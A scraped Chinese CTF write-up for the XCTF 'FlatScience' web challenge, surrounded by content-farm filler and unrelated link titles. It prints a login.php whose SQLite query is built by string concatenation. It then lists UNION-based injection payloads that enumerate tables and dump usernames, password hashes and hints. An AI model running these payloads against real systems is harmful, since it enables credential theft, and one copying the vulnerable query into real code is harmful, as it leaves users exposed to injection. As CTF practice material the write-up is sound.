当前位置: 首页 > news >正文

微网站是用什么开发的网站推广策划案例

微网站是用什么开发的,网站推广策划案例,typecho迁移wordpress,一个女的让我和她做优惠网站攻防世界38-FlatScience-Web 点开这个here看到一堆pdf,感觉没用&#xff0c;扫描一下 试试弱口令先 源码里有&#xff1a; 好吧0.0 试试存不存在sql注入 根本没回显&#xff0c;转战login.php先 输入1’,发现sql注入 看到提示 访问后得源码 <?php ob_start(); ?>…

攻防世界38-FlatScience-Web

点开这个here看到一堆pdf,感觉没用,扫描一下

image-20241112213147892

试试弱口令先

image-20241112213254645

源码里有:

好吧0.0

试试存不存在sql注入

根本没回显,转战login.php先

输入1’,发现sql注入

image-20241112215625192

image-20241112215405748

看到提示

访问后得源码

<?php
ob_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"><html>
<head>
<style>
blockquote { background: #eeeeee; }
h1 { border-bottom: solid black 2px; }
h2 { border-bottom: solid black 1px; }
.comment { color: darkgreen; }
</style><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Login</title>
</head>
<body><div align=right class=lastmod>
Last Modified: Fri Mar  31:33:7 UTC 1337
</div><h1>Login</h1>Login Page, do not try to hax here plox!<br><form method="post">ID:<br><input type="text" name="usr"><br>Password:<br> <input type="text" name="pw"><br><br><input type="submit" value="Submit">
</form><?php
if(isset($_POST['usr']) && isset($_POST['pw'])){$user = $_POST['usr'];$pass = $_POST['pw'];$db = new SQLite3('../fancy.db');$res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");if($res){$row = $res->fetchArray();}else{echo "<br>Some Error occourred!";}if(isset($row['id'])){setcookie('name',' '.$row['name'], time() + 60, '/');header("Location: /");die();}}if(isset($_GET['debug']))
highlight_file('login.php');
?>
<!-- TODO: Remove ?debug-Parameter! --><hr noshade>
<address>Flux Horst (Flux dot Horst at rub dot flux)</address>
</body>

​ $db = new SQLite3(‘…/fancy.db’);提示是个sqlite注入

payload里注入

image-20241112221500703

返回在右上角

image-20241112221652101

usr=' union select 1,group_concat(tbl_name) from sqlite_master where type='table'--&pw= //查所有表
usr=' union select 1,group_concat(sql) from sqlite_master where tbl_name='Users'--&pw= //查表所有字段
//查所有内容
usr=' union select 1,group_concat(id) from Users--&pw=1
usr=' union select 1,group_concat(name) from Users--&pw=1
usr=' union select 1,group_concat(password) from Users--&pw=1
usr=' union select 1,group_concat(hint) from Users--&pw=

得到hint,下面做不动了

贴一个大佬的wp

oncat(password) from Users–&pw=1
usr=’ union select 1,group_concat(hint) from Users–&pw=


得到hint,下面做不动了贴一个大佬的wp[FlatScience XCTF web进阶区FlatScience详解-CSDN博客](https://blog.csdn.net/weixin_43693550/article/details/120241607?spm=1001.2101.3001.6650.2&utm_medium=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-2-120241607-blog-112161044.235^v43^pc_blog_bottom_relevance_base4&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-2-120241607-blog-112161044.235^v43^pc_blog_bottom_relevance_base4&utm_relevant_index=5)
http://www.yayakq.cn/news/574774/

相关文章:

  • 景区网站建设原则FPGA毕业设计代做网站
  • 全国水利建设市场信用信息平台门户网站百度指数有三个功能模块
  • 基础展示营销型型网站岳阳做网站哪家好
  • 搜索网站做推广手机上能搭建网站吗
  • 做网站资料选择一个网站进行优化
  • 贵阳美容网站建设引流渠道有哪些平台
  • 进地铁建设公司网站开发什么网站好
  • 东莞做阀门的网站网站建设的售后服务怎么写
  • 做公司网站主要需要什么科目icp网站备案查询
  • 郴州哪里做网站怎么样做一个自己的网站
  • 中英文的网站设计农林网站建设
  • 国外门户网站源码室内设计相关网站
  • 桥东区住房和建设局网站wordpress 移动 插件
  • 如何搭建一个论坛网站企业网站关键词优化排名应该怎么做
  • 珠海网站制作专业外贸仿牌网站
  • 成都网站优化seo大连网站设计布局
  • 网站平台做期货唯美谷智能网站建设系统
  • 合肥企业网站排名优化dede wap网站
  • 小企业官方网站制作网站色差表
  • 网站建设哪里好免费模板ppt下载
  • 官渡网站建设经营网站如何挣钱
  • 怎么自己弄网站免费网站如何做app
  • 二极管 东莞网站建设渝北集团网站建设
  • 二手房网站开发背景南昌网站建设冲浪者科技
  • 柳州做网站那家好个人网站可以做商城吗
  • 自助建站管理平台了解深圳网站定制开发
  • 做网站用com还是cn好广告宣传网站
  • 网站查备案密码上海嘉定网页设计
  • 网站设计计划书的内容wordpress 综合主题
  • 做网站 怎么备案网站备案转服务器